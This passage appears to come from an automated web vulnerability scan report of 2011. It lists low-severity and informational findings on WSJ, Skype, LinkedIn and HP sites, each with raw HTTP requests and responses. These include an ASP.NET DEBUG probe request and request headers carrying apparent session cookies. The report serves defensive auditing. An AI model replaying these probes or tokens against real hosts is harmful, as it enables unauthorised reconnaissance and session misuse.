<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</h4>
<form action="http://commerce.wsj.com/auth/submitlogin" id="login_form" name="login_form" method="post" onsubmit="suppress_popup=true;return true;">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="password" id="login_password" class="login_pswd" tabindex="2" value="" maxlength="30"/>
<input type="hidden" name="url" id="page_url" value=""/>
...[SNIP]...

12.4. http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /article/SB10001424053111904900904576549933849920392.html

Issue detail

The page contains a form with the following action URL:The form contains the following password fields with autocomplete enabled:

Request

GET /article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj HTTP/1.1
Host: online.wsj.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Houlihan+Lokey
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 16:17:18 GMT
Server: Apache/2.0.64 (Unix)
FastDynaPage-ServerInfo: sbkj2kapachep05 - Sun 09/04/11 - 09:07:13 EDT
Cache-Control: max-age=15
Expires: Sun, 04 Sep 2011 16:17:33 GMT
Vary: Accept-Encoding
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Content-Length: 191170
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</div>

<form name="freeRegistration_form" id="freeRegistration_form" action="" method="post" accept-charset="utf-8" onsubmit="return false;">
<ul class="regForms">
...[SNIP]...
</label>
<input type="password" name="passwordReg" value="" id="passwordReg" maxlength='15' class="text" />
</div>
...[SNIP]...
</label>

<input type="password" name="passwordConfirmationReg" value="" id="passwordConfirmationReg" maxlength='15' class="text" />
</div>
...[SNIP]...

13. Source code disclosure  previous  next
There are 2 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


13.1. https://developer.skype.com/javascripts/skype/pp/prettify.js  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   https://developer.skype.com
Path:   /javascripts/skype/pp/prettify.js

Issue detail

The application appears to disclose some server-side source code written in PHP and ASP.

Request

GET /javascripts/skype/pp/prettify.js HTTP/1.1
Accept: application/javascript, */*;q=0.8
Referer: https://developer.skype.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: developer.skype.com
Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-login=t86pb1r0mu6sbpo95hdcctf9i7; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; _mysapp_v2=BAh7BzoPc2Vzc2lvbl9pZCIlY2Y5NjY3NDcwMDVhODUwYTgyYTEzZDZjYzBkOGIyZTQ6DnBhZ2VfbW9kZUkiCXZpZXcGOgZFRg%3D%3D--5b0f3cac52403de90bd5ee3cef7d8eb8aeb543ca

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:07:23 GMT
Server: Apache
Last-Modified: Fri, 02 Sep 2011 10:07:56 GMT
ETag: "3095c-4876-4abf28903b700"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 21:07:23 GMT
Vary: Accept-Encoding,User-Agent
X-Web-2.0: AxD=1481
X-UA-Compatible: IE=edge,chrome=1
Content-Length: 18550
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/x-javascript

var r=true,t=null,B=false;window.PR_SHOULD_USE_CONTINUATION=r;window.PR_TAB_WIDTH=8;window.PR_normalizedHtml=window.PR=window.prettyPrintOne=window.prettyPrint=void 0;window._pr_isIE6=function(){var A
...[SNIP]...
else for if return while case done elif esac eval fi function in local set then until ",
hashComments:r,cStyleComments:r,multiLineStrings:r,regexLiterals:r}),J={};w(oa,["default-code"]);w(E([],[[C,/^[^<?]+/],["dec",/^<!\w[^>]*(?:>|$)/],[F,/^<\!--[\s\S]*?(?:-\->|$)/],["lang-",/^<\?([\s\S]+?)(?:\?>|$)/],["lang-",/^<%([\s\S]+?)(?:%>|$)/],[H,/^(?:<[%?]|[%?]>
...[SNIP]...

13.2. http://platform.linkedin.com/js/nonSecureAnonymousFramework  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://platform.linkedin.com
Path:   /js/nonSecureAnonymousFramework

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /js/nonSecureAnonymousFramework?v=0.0.1132-RC3.9082-1337 HTTP/1.1
Host: platform.linkedin.com
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html?mod=googlenews_wsj
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bcookie="v=1&e6907e29-3b50-4659-95ed-c5124b8e731f"

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=604800
Content-Type: text/javascript
Date: Sun, 04 Sep 2011 16:17:29 GMT
Expires: Sun, 11 Sep 2011 16:17:29 GMT
Last-Modified: Thu, 01 Sep 2011 02:17:52 GMT
Server: ECS (sjo/5235)
Vary: Accept-Encoding
X-Cache: HIT
Content-Length: 144326

(function(){
var l,
doAuth,
h = [],
valid = false,
a = "",
fwk = "http://platform.linkedin.com/js/framework?v=0.0.1132-RC3.9082-1337",
xtnreg = /extensions=([^&]*)&?/,
xtn
...[SNIP]...
<?js ?>";
l=l.split(" ");
var p=l[0]||"<?js",o=l[1]||"?>";
if(!p||!o){throw new Error("Template markers must be set.")
}if(p==o){throw new Error("Start and end markers cannot be identical.")
}p=new RegExp(b(p),"g");
o=new RegExp(b(o),"g");
var n=["","var p=
...[SNIP]...

14. ASP.NET debugging enabled  previous  next
There are 2 instances of this issue:

Issue background

ASP.NET allows remote debugging of web applications, if configured to do so. By default, debugging is subject to access control and requires platform-level authentication.

If an attacker can successfully start a remote debugging session, this is likely to disclose sensitive information about the web application and supporting infrastructure which may be valuable in formulating targeted attacks against the system.

Issue remediation

To disable debugging, open the Web.config file for the application, and find the <compilation> element within the <system.web> section. Set the debug attribute to "false". Note that it is also possible to enable debugging for all applications within the Machine.config file. You should confirm that debug attribute in the <compilation> element has not been set to "true" within the Machine.config file also.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.



14.1. http://h17007.www1.hp.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://h17007.www1.hp.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: h17007.www1.hp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 16:31:00 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

14.2. http://h20158.www2.hp.com/Default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://h20158.www2.hp.com
Path:   /Default.aspx

Issue detail

ASP.NET debugging is enabled on the server. The user context used to scan the application does not appear to be permitted to perform debugging, so this is not an immediately exploitable issue. However, if you were able to obtain or guess appropriate platform-level credentials, you may be able to perform debugging.

Request

DEBUG /Default.aspx HTTP/1.0
Host: h20158.www2.hp.com
Command: start-debug

Response

HTTP/1.1 401 Unauthorized
Connection: close
Date: Sun, 04 Sep 2011 16:31:03 GMT
Server: Microsoft-IIS/6.0
WWW-Authenticate: Negotiate
WWW-Authenticate: NTLM
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39

Debug access denied to '/Default.aspx'.

15. Referer-dependent response  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://community.skype.com
Path:   /t5/help/faqpage/faq-category-id/registration

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the contents of responses is updated based on Referer data, then the same defences against malicious input should be employed here as for any other kinds of user-supplied data.

Request 1

GET /t5/help/faqpage/faq-category-id/registration HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://community.skype.com/t5/help/faqpage
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response 1

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:45 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 44590
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
<a href="https://secure.skype.com/login?partner_id=b38bf07d4373f92f5932f9e2887a32e0&return_url=http%3A%2F%2Fcommunity.skype.com%2Ft5%2Fhelp%2Ffaqpage">Sign In</a>
                       <a id="join" class="button2 altCta2" href="http://www.skype.com/go/register"><span>Join Skype</span></a>
                   </div>
               </div>
               <div id="skypeLogo" class="ir"><a href="http://www.skype.com/go/home?intcmp=alogo">
                   <span></span></a>
               </div>
               <div id="globalNav">
                   <nav>
                       <ul>
                           <li id="HTMLID" class="first fourColumns ">
                               <a href="http://www.skype.com/intl/en/features" title="All features">Features<span></span></a>
                               <div class="pointer"></div>
                               <div class="sub">
                                   <div class="menu">
                                       <ul>
                                           <li class="title">Calling</li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls">Skype-to-Skype</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles">Phones and mobiles</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/online-number">Online Number</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/conference-calls">Conference calls</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number">Skype To Go number</a></li>
                                       </ul>
                                       <ul>
                                           <li class="title">Video</li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/video-call">Video calling</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/group-video-calls">Group video calling</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/screen-sharing">Screen sharing</a></li>
                                       </ul>
                                       <ul>
                                           <li class="title">Messaging</li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/instant-messaging">Instant messaging</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/send-files">Send files</a></li>
                                           <li><a href="
...[SNIP]...

Request 2

GET /t5/help/faqpage/faq-category-id/registration HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: community.skype.com
Proxy-Connection: Keep-Alive
Cookie: skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824; SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170534:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.115/0; VISITORID=1344388383; LiSESSIONID=3607C6434AF107556B11C2CE05ECE91B

Response 2

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:33:47 GMT
Server: Apache/2.2.17 (Unix) mod_jk/1.2.31 mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, private
Vary: Accept-Encoding
Content-Length: 44622
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   
   
       <title> Help - Skype
...[SNIP]...
<a href="https://secure.skype.com/login?partner_id=b38bf07d4373f92f5932f9e2887a32e0&return_url=http%3A%2F%2Fcommunity.skype.com%2Ft5%2Fhelp%2Ffaqpage%2Ffaq-category-id%2Fregistration">Sign In</a>
                       <a id="join" class="button2 altCta2" href="http://www.skype.com/go/register"><span>Join Skype</span></a>
                   </div>
               </div>
               <div id="skypeLogo" class="ir"><a href="http://www.skype.com/go/home?intcmp=alogo">
                   <span></span></a>
               </div>
               <div id="globalNav">
                   <nav>
                       <ul>
                           <li id="HTMLID" class="first fourColumns ">
                               <a href="http://www.skype.com/intl/en/features" title="All features">Features<span></span></a>
                               <div class="pointer"></div>
                               <div class="sub">
                                   <div class="menu">
                                       <ul>
                                           <li class="title">Calling</li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/skype-to-skype-calls">Skype-to-Skype</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/call-phones-and-mobiles">Phones and mobiles</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/online-number">Online Number</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/conference-calls">Conference calls</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/skype-to-go-number">Skype To Go number</a></li>
                                       </ul>
                                       <ul>
                                           <li class="title">Video</li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/video-call">Video calling</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/group-video-calls">Group video calling</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/screen-sharing">Screen sharing</a></li>
                                       </ul>
                                       <ul>
                                           <li class="title">Messaging</li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/instant-messaging">Instant messaging</a></li>
                                           <li><a href="http://www.skype.com/intl/en/features/allfeatures/send-files">Send files</a></li>

...[SNIP]...

16. Cross-domain POST  previous  next
There are 134 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


16.1. http://blogs.skype.com/de/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /de/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /de/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:13 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61616
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de" lang="de">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypede', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.2. http://blogs.skype.com/developer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /developer/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:08 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59562
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypedevzone', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.3. http://blogs.skype.com/developer/2011/03/longer_playtime_courtesy_of_si.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/2011/03/longer_playtime_courtesy_of_si.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /developer/2011/03/longer_playtime_courtesy_of_si.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:11 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 60729
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypedevzone', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.4. http://blogs.skype.com/developer/2011/06/breaking_down_the_barriers_one.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/2011/06/breaking_down_the_barriers_one.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /developer/2011/06/breaking_down_the_barriers_one.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:10 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 58059
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypedevzone', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.5. http://blogs.skype.com/developer/2011/06/bringing_video_to_the_next_wav.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /developer/2011/06/bringing_video_to_the_next_wav.html

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /developer/2011/06/bringing_video_to_the_next_wav.html HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:09 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 59244
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=skypedevzone', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.6. http://blogs.skype.com/en/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://heartbeat.skype.com/2011/08/paypal_payments_temporarily_un.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: blogs.skype.com
Proxy-Connection: Keep-Alive
Cookie: SC=CC=:CCY=:LC=en-us:LIM=:TM=1315170217:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0; skype-session-token=1881419e1eee3fb8450596c7441d08afecceb824

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:05:33 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 61967
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.7. http://blogs.skype.com/en/2005/05/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/05/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/05/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:03 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 230490
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.8. http://blogs.skype.com/en/2005/06/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/06/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/06/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:02 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 377860
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.9. http://blogs.skype.com/en/2005/07/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/07/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/07/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:43:00 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 594031
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.10. http://blogs.skype.com/en/2005/08/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/08/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/08/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:57 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 412787
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Skype -
...[SNIP]...
</h3>
<form action="http://feedburner.google.com/fb/a/mailverify" method="post" target="popupwindow" onsubmit="window.open('http://feedburner.google.com/fb/a/mailverify?uri=shareskypeen', 'popupwindow', 'scrollbars=yes,width=550,height=520');return true">
<fieldset>
...[SNIP]...

16.11. http://blogs.skype.com/en/2005/09/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.skype.com
Path:   /en/2005/09/

Issue detail

The page contains a form which POSTs data to the domain feedburner.google.com. The form contains the following fields:

Request

GET /en/2005/09/ HTTP/1.1
Host: blogs.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:42:56 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 362300
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
